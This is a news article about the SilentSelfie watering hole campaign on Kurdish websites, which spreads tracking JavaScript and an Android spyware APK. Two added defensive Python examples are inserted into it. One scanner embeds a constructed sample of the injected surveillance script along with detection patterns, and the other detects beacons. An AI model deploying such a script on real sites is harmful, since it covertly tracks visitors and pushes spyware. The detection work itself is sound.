Watering Hole Attack on Kurdish Sites Disseminating Malicious APKs and Spyware

Sep 26, 2024Ravie LakshmananCyber Espionage / Mobile Security

A total of 25 websites associated with the Kurdish minority have fallen victim to a watering hole attack aimed at collecting confidential information for a period exceeding one and a half years.

Revealing details of the campaign called SilentSelfie, French cybersecurity company Sekoia referred to the breach as an ongoing one, with initial signs of compromise recognized as early as December 2022.

The compromised websites are used to distribute four different variants of an information-gathering framework, according to the firm.

“These ranged from the simplest, which merely stole the user’s location, to more intricate ones that captured images from the selfie camera and directed chosen users to install a malicious APK, i.e., an application utilized on Android,” security researchers Felix Aimé and Maxime A mentioned in a report issued on Wednesday.

The targeted sites comprise Kurdish press and media outlets, the Rojava administration and its armed forces, sites affiliated with revolutionary far-left political groups and bodies in Türkiye and Kurdish territories. Sekoia informed The Hacker News that the exact manner in which these websites were initially breached remains unspecified.

The perpetrators behind these attacks have not been connected to any recognized threat actor or entity, indicating the rise of a new threat group targeting the Kurdish community, a community that has previously been singled out by threat actors such as StrongPity and BladeHawk.

Earlier this year, Dutch security company Hunt & Hackett disclosed that Kurdish websites in the Netherlands were specifically targeted by a Türkiye-nexus threat actor referred to as Sea Turtle.

The watering hole attacks involve the deployment of a malevolent JavaScript responsible for collecting various types of data from visitors to the sites, including their location, device specifications (e.g., number of CPUs, battery status, browser language, etc.), and public IP address, among others.

One version of the reconnaissance script, identified on three sites (rojnews[.]news, hawarnews[.]com, and targetplatform[.]net), has been observed redirecting users to malicious Android APK files, while other versions enable user tracking through a cookie named “sessionIdVal.”
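The behaviour described above (a script that harvests location, CPU count, battery state, browser language and public IP, sets a “sessionIdVal” cookie, and pushes Android visitors to an APK) is a combination of browser APIs that a site owner can look for in their own pages. The following is an added example, not Sekoia's code and not the real payload: a small Python scanner that scores inline scripts by how many of these indicators co-occur. The two script samples and the indicator weights are constructed for this example and are assumptions; any single indicator is legitimate on its own, so the verdict depends on the combination.

```python
import re
from dataclasses import dataclass, field

# Constructed sample modelled on the behaviour the article describes
# (location, CPU count, battery, language, public IP, tracking cookie,
# APK redirect, POST beacon). This is NOT the real injected script.
SAMPLE_INJECTED_JS = r"""
(function(){
  var d = {};
  d.cpus = navigator.hardwareConcurrency;
  d.lang = navigator.language;
  navigator.getBattery().then(function(b){ d.bat = b.level; });
  navigator.geolocation.getCurrentPosition(function(p){ d.lat=p.coords.latitude; d.lon=p.coords.longitude; });
  fetch("https://api.ipify.org?format=json").then(r=>r.json()).then(j=>{ d.ip=j.ip; });
  if (!document.cookie.match(/sessionIdVal=/)) { document.cookie = "sessionIdVal=" + Math.random(); }
  if (/Android/i.test(navigator.userAgent)) { window.location = "/downloads/app.apk"; }
  var x = new XMLHttpRequest(); x.open("POST", "/wp-includes/sitemaps/", true); x.send(JSON.stringify(d));
})();
"""

# Constructed benign sample: a site that only reads the language to pick UI strings.
SAMPLE_BENIGN_JS = r"""
document.addEventListener("DOMContentLoaded", function(){
  var lang = navigator.language;
  document.getElementById("greeting").textContent = lang.startsWith("ku") ? "Silav" : "Hello";
});
"""

# (name, pattern, weight). Weights are an assumption for this example; tune
# them against your own corpus of known-good pages.
INDICATORS = [
    ("geolocation", re.compile(r"navigator\.geolocation\.(getCurrentPosition|watchPosition)"), 3),
    ("cpu_count", re.compile(r"navigator\.hardwareConcurrency"), 1),
    ("battery", re.compile(r"navigator\.getBattery\s*\("), 2),
    ("language", re.compile(r"navigator\.language"), 1),
    ("public_ip_lookup", re.compile(r"ipify|ipinfo\.io|api\.ip\w*\.\w+"), 2),
    ("tracking_cookie", re.compile(r"sessionIdVal"), 3),
    ("apk_redirect", re.compile(r"(location\.href|window\.location)\s*=\s*[\"'][^\"']*\.apk"), 4),
    ("camera", re.compile(r"getUserMedia\s*\("), 3),
    ("beacon_post", re.compile(r"open\(\s*[\"']POST[\"']|fetch\([^)]*method\s*:\s*[\"']POST"), 1),
]


@dataclass
class ScanResult:
    score: int
    hits: list = field(default_factory=list)
    verdict: str = "clean"


def scan_script(source: str, threshold: int = 6) -> ScanResult:
    """Score one script body. The verdict turns on co-occurrence: a news site may
    legitimately read the language or ask for location, but not all of these at once."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(source)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return ScanResult(score=score, hits=hits, verdict="suspicious" if score >= threshold else "clean")


def extract_inline_scripts(html: str) -> list:
    """Pull the bodies of <script>...</script> blocks out of a page (inline scripts only)."""
    return [m.group(1) for m in re.finditer(r"<script[^>]*>(.*?)</script>", html, re.S | re.I)]


def scan_page(html: str) -> list:
    """Scan every inline script on a page and return one ScanResult per script."""
    return [scan_script(s) for s in extract_inline_scripts(html)]


if __name__ == "__main__":
    for label, src in (("injected", SAMPLE_INJECTED_JS), ("benign", SAMPLE_BENIGN_JS)):
        r = scan_script(src)
        print(f"{label}: {r.verdict} score={r.score} hits={r.hits}")
```

Run this over a crawl of your own site's pages (including pages served to mobile user agents, since one variant only acted on Android visitors); a score that jumps between two crawls of the same page is the strongest signal, because an injected script changes the page while the site's own code does not.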

Based on Sekoia’s examination, the Android app integrates the website itself as a WebView, while surreptitiously retrieving system data, contact lists, location information, and files stored in the external storage, depending on the permissions granted to it.

“It’s important to note that this malicious code lacks any persistence mechanism but is solely activated when the user opens the RojNews application,” highlighted the researchers.

“After the user launches the application and waits for 10 seconds, the LocationHelper service starts transmitting signals in the background to the URL rojnews[.]news/wp-includes/sitemaps/ via HTTP POST requests, sharing the user’s current location and standing by for instructions to execute.”
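The beacon pattern quoted above, a background service sending HTTP POST requests at a fixed cadence to a path under wp-includes (a WordPress library directory that never accepts form posts in normal operation), is something a network defender can pick out of proxy or web-server logs. The following is an added example, not part of Sekoia's report: a Python detector that groups POSTs by client and target and flags (a) POSTs to a static-code directory and (b) POST series with near-constant interval and size. The log lines and their format are constructed for this example; the thresholds are assumptions to tune on your own traffic.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log (not real telemetry). Assumed format per line:
# "<ISO timestamp> <client> <method> <host><path> <bytes_out>"
# Client 10.0.0.5 shows the beacon shape the article describes; 10.0.0.9 is
# an ordinary visitor posting two comments.
SAMPLE_LOG = """\
2024-09-20T10:00:00 10.0.0.5 GET rojnews[.]news/ 0
2024-09-20T10:00:10 10.0.0.5 POST rojnews[.]news/wp-includes/sitemaps/ 412
2024-09-20T10:01:10 10.0.0.5 POST rojnews[.]news/wp-includes/sitemaps/ 410
2024-09-20T10:02:10 10.0.0.5 POST rojnews[.]news/wp-includes/sitemaps/ 415
2024-09-20T10:03:11 10.0.0.5 POST rojnews[.]news/wp-includes/sitemaps/ 411
2024-09-20T10:04:10 10.0.0.5 POST rojnews[.]news/wp-includes/sitemaps/ 413
2024-09-20T10:00:03 10.0.0.9 GET rojnews[.]news/wp-content/themes/x/style.css 0
2024-09-20T10:05:44 10.0.0.9 POST rojnews[.]news/wp-comments-post.php 2210
2024-09-20T10:31:02 10.0.0.9 POST rojnews[.]news/wp-comments-post.php 1870
"""

# Directories that hold code/assets in a WordPress install and should not be POST targets.
STATIC_DIRS = ("wp-includes/",)


@dataclass
class Finding:
    client: str
    target: str
    count: int
    mean_interval_s: float
    reasons: list


def parse_log(text: str) -> list:
    """Parse the constructed log format into (timestamp, client, method, url, size) tuples."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url, size = line.split()
        rows.append((datetime.fromisoformat(ts), client, method, url, int(size)))
    return rows


def _cv(values: list) -> float:
    """Coefficient of variation (population stdev / mean); 0 for an all-zero series."""
    m = mean(values)
    return pstdev(values) / m if m else 0.0


def find_beacons(rows: list, min_posts: int = 4, max_interval_cv: float = 0.2,
                 max_size_cv: float = 0.1) -> list:
    """Group POSTs per (client, target) and flag static-directory posts and
    periodic, fixed-size series. Thresholds are assumptions for this example."""
    groups = defaultdict(list)
    for ts, client, method, url, size in rows:
        if method == "POST":
            groups[(client, url)].append((ts, size))

    findings = []
    for (client, url), events in groups.items():
        reasons = []
        path = url.split("/", 1)[1] if "/" in url else ""
        if path.startswith(STATIC_DIRS):
            reasons.append("post_to_static_dir")
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        if len(events) >= min_posts:
            sizes = [s for _, s in events]
            if _cv(gaps) <= max_interval_cv and _cv(sizes) <= max_size_cv:
                reasons.append("periodic_fixed_size_post")
        if reasons:
            findings.append(Finding(client, url, len(events), mean(gaps) if gaps else 0.0, reasons))
    return findings


if __name__ == "__main__":
    for f in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{f.client} -> {f.target}: {f.count} POSTs, ~{f.mean_interval_s:.0f}s apart, {f.reasons}")
```

The static-directory rule is the cheap one and works on a single request; the periodicity rule needs a few requests but also catches a beacon that has been moved to a less conspicuous path. On the server side, the same observation suggests a mitigation: deny POST to wp-includes and wp-content at the web server, which breaks this collection channel without touching site functionality.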

Not much information is available about the individuals behind SilentSelfie, though Sekoia has speculated that it may be linked to the Kurdistan Regional Government of Iraq following the detention of RojNews journalist Silêman Ehmed by KDP forces in October 2023. He was sentenced to three years in prison in July 2024.

“Despite the modest complexity of this watering hole campaign, it is remarkable for the volume of Kurdish websites impacted and its prolonged duration,” remarked the researchers. “The campaign’s rudimentary nature suggests it could be the handiwork of a yet undiscovered threat actor with limited capabilities and relatively new to the domain.”
